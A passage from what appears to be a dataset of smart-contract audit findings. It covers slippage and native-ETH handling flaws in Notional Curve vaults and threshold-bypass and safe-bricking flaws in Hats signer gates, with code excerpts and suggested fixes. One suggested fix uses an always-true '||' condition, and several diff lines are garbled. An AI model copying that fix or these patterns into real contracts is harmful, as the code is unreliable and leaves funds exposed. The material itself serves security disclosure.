TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n" +Oracle slippage rate is used for checking primary and secondary ratio,medium,"The oracle slippage rate (oraclePriceDeviationLimitPercent) is used for checking the ratio of the primary and secondary tokens to be deposited into the pool.\\nAs a result, changing the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot and oracle prices can cause unexpected side-effects to the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain condition.\\nThe `_checkPriceLimit` function is for the purpose of comparing the spot price with the oracle price. Thus, the slippage (oraclePriceDeviationLimitPercent) is specially selected for this purpose.\\n```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n\\nHowever, it was observed that `_checkPriceLimit` function is repurposed for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances within the `_checkPrimarySecondaryRatio` function during reinvestment.\\nThe `oraclePriceDeviationLimitPercent` setting should not be used here as it does not involve any oracle data. Thus, the correct way is to define another setting specifically for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\n","There is a difference between the slippage for the following two items:\\nAllowable slippage between the spot price and oracle price\\nAllowable slippage between the ratio of the primary and secondary tokens to be deposited to the pool against the pool's balances\\nSince they serve a different purposes, they should not share the same slippage. Consider defining a separate slippage setting and function for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.","Changing the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot price and oracle price can cause unexpected side-effects to the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain condition.\\nAdditionally, the value chosen for the `oraclePriceDeviationLimitPercent` is to compare the spot price with the oracle price. Thus, it might not be the optimal value for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.","```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n" +Logic Error due to different representation of Native ETH (0x0 & 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE),medium,"Unexpected results might occur during vault initialization if either of the pool's tokens is a Native ETH due to the confusion between `Deployments.ETH_ADDRESS (address(0))` and `Deployments.ALT_ETH_ADDRESS (0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE)`.\\nThe `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is explicitly converted to `Deployments.ETH_ADDRESS (address(0)` during deployment.\\n```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n\\nIt was observed that there is a logic error within the `Curve2TokenConvexVault.initialize` function. Based on Lines 56 and 59 within the `Curve2TokenConvexVault.initialize` function, it assumes that if either the primary or secondary token is ETH, then the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will be set to `Deployments.ALT_ETH_ADDRESS`, which point to `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE`.\\nHowever, this is incorrect as the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` has already been converted to `Deployments.ETH_ADDRESS (address(0))` during deployment. Refer to the constructor of `Curve2TokenPoolMixin`.\\nThus, the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will never be equal to `Deployments.ALT_ETH_ADDRESS`, and the condition at Lines 56 and 59 will always evaluate to True.\\n```\\nFile: Curve2TokenConvexVault.sol\\ncontract Curve2TokenConvexVault is Curve2TokenVaultMixin {\\n..SNIP..\\n function initialize(InitParams calldata params)\\n external\\n initializer\\n onlyNotionalOwner\\n {\\n __INIT_VAULT(params.name, params.borrowCurrencyId);\\n CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n\\n CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n }\\n```\\n\\nAs a result, if the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is `Deployments.ETH_ADDRESS (address(0))`, the code will go ahead to call the `checkApprove` function, which might cause unexpected results during vault initialization.","If the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is equal to `Deployments.ALT_ETH_ADDRESS` or `Deployments.ETH_ADDRESS`, this means that it points to native ETH and the `checkApprove` can be safely skipped.\\n```\\nfunction initialize(InitParams calldata params)\\n external\\n initializer\\n onlyNotionalOwner\\n{\\n __INIT_VAULT(params.name, params.borrowCurrencyId);\\n CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n// Remove the line below\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS || PRIMARY_TOKEN != Deployments.ETH_ADDRESS) {\\n IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n// Remove the line below\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS || SECONDARY_TOKEN != Deployments.ETH_ADDRESS) {\\n IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n\\n CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n}\\n```\\n",Unexpected results during vault initialization if either of the pool's tokens is a Native ETH.,"```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n" +Ineffective slippage mechanism when redeeming proportionally,high,"A trade will continue to be executed regardless of how bad the slippage is since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. Thus, a trade might incur significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `params.minPrimary` and `params.minSecondary` are calculated automatically based on the share of the Curve pool with a small discount within the `Curve2TokenConvexHelper._executeSettlement` function (Refer to Line 124 below)\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / // @audit-info poolSlippageLimitPercent = 9975, # 0.25%\\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)); // @audit-info VAULT_PERCENT_BASIS = 1e4 = 10000\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen LP tokens are redeemed proportionally via the Curve Pool's `remove_liquidity` function, the tokens received are based on the share of the Curve pool as the source code.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity(\\n _amount: uint256,\\n _min_amounts: uint256[N_COINS],\\n) -> uint256[N_COINS]:\\n """"""\\n @notice Withdraw coins from the pool\\n @dev Withdrawal amounts are based on current deposit ratios\\n @param _amount Quantity of LP tokens to burn in the withdrawal\\n @param _min_amounts Minimum amounts of underlying coins to receive\\n @return List of amounts of coins that were withdrawn\\n """"""\\n amounts: uint256[N_COINS] = self._balances()\\n lp_token: address = self.lp_token\\n total_supply: uint256 = ERC20(lp_token).totalSupply()\\n CurveToken(lp_token).burnFrom(msg.sender, _amount) # dev: insufficient funds\\n\\n for i in range(N_COINS):\\n value: uint256 = amounts[i] * _amount / total_supply\\n assert value >= _min_amounts[i], ""Withdrawal resulted in fewer coins than expected""\\n\\n amounts[i] = value\\n if i == 0:\\n raw_call(msg.sender, b"""", value=value)\\n else:\\n assert ERC20(self.coins[1]).transfer(msg.sender, value)\\n\\n log RemoveLiquidity(msg.sender, amounts, empty(uint256[N_COINS]), total_supply - _amount)\\n\\n return amounts\\n```\\n\\nAssume a Curve Pool with the following state:\\nConsists of 200 US Dollars worth of tokens (100 DAI and 100 USDC). DAI is the primary token\\nDAI <> USDC price is 1:1\\nTotal Supply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `49.875 DAI` as `params.minPrimary` and `49.875 USDC` as `params.minSecondary` based on the following calculation\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (100 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 100 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 49.875 DAI\\n\\nminSecondary = same calculation = 49.875 USDC\\n```\\n\\nCurve Pool's `remove_liquidity` function will return `50 DAI` and `50 USDC` if 50 LP Pool Tokens are redeemed.\\nNote that `TwoTokenPoolUtils._getMinExitAmounts` function performs the calculation based on the spot balance of the pool similar to the approach of the Curve Pool's `remove_liquidity` function. However, the `TwoTokenPoolUtils._getMinExitAmounts` function applied a discount to the returned result, while the Curve Pool's `remove_liquidity` function did not.\\nAs such, the number of tokens returned by Curve Pool's `remove_liquidity` function will always be larger than the number of tokens returned by the `TwoTokenPoolUtils._getMinExitAmounts` function regardless of the on-chain economic condition or the pool state (e.g. imbalance). Thus, the minimum amounts (minAmounts) pass into the Curve Pool's `remove_liquidity` function will never be triggered under any circumstance.\\n```\\na = Curve Pool's remove_liquidity => x DAI\\nb = TwoTokenPoolUtils._getMinExitAmounts => (x DAI - 0.25% discount)\\na > b => true (for all instances)\\n```\\n\\nThus, the `TwoTokenPoolUtils._getMinExitAmounts` function is not effective in determining the slippage when redeeming proportionally.","When redeeming proportional, theTwoTokenPoolUtils._getMinExitAmounts function can be removed. Instead, give the caller the flexibility to define the slippage/minimum amount (params.minPrimary and params.minSecondary). To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a proportional trade (remove_liquidity) is to call the Curve's Pool `calc_token_amount` function off-chain and reduce the values returned by the allowed slippage amount.\\nNote that `calc_token_amount` cannot be used solely on-chain for computing the minimum amount because the result can be manipulated because it uses spot balances for computation.\\nSidenote: Removing `TwoTokenPoolUtils._getMinExitAmounts` function also removes the built-in spot price and oracle price validation. Thus, the caller must remember to define the slippage. Otherwise, the vault settlement will risk being sandwiched. Alternatively, shift the `strategyContext._checkPriceLimit(oraclePrice, spotPrice)` code outside the `TwoTokenPoolUtils._getMinExitAmounts` function.","A trade will always be executed even if it returns fewer than expected assets since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. Thus, a trade might incur unexpected slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.","```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n" +Users are forced to use the first pool returned by the Curve Registry,medium,"If multiple pools support the exchange, users are forced to use the first pool returned by the Curve Registry. The first pool returned by Curve Registry might not be the most optimal pool to trade with. The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.\\nWhen performing a trade via the `CurveAdapter._exactInSingle` function, it will call the `CURVE_REGISTRY.find_pool_for_coins` function to find the available pools for exchanging two coins.\\n```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n\\nHowever, it was observed that when multiple pools are available, users can choose the pool to return by defining the `i` parameter of the `find_pool_for_coins` function as shown below.\\n```\\n@view\\n@external\\ndef find_pool_for_coins(_from: address, _to: address, i: uint256 = 0) -> address:\\n """"""\\n @notice Find an available pool for exchanging two coins\\n @param _from Address of coin to be sent\\n @param _to Address of coin to be received\\n @param i Index value. When multiple pools are available\\n this value is used to return the n'th address.\\n @return Pool address\\n """"""\\n key: uint256 = bitwise_xor(convert(_from, uint256), convert(_to, uint256))\\n return self.markets[key][i]\\n```\\n\\nHowever, the `CurveAdapter._exactInSingle` did not allow users to define the `i` parameter of the `find_pool_for_coins` function. As a result, users are forced to trade against the first pool returned by the Curve Registry.","If multiple pools support the exchange, consider allowing the users to choose which pool they want to trade against.\\n```\\nfunction _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n{\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n// Remove the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n// Add the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken, trade.pool_index)); \\n```\\n","The first pool returned by Curve Registry might not be the most optimal pool to trade with. The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.","```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n" +Signers can bypass checks and change threshold within a transaction,high,"The `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.","Save the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.","Signers can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.",```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n +HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCount,high,"The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that both functions do not allow that there exist more valid signers than `maxSigners`.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSignatures=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\n","The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n","As mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.","```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n" +Signers can brick safe by adding unlimited additional signers while avoiding checks,high,"There are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the safe. However, there is no check to ensure that additional owners are not added to the safe. This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert as long as the new owners are now activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. The check passes, but the new owners are already valid signers. There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.",There should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.,"Signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might 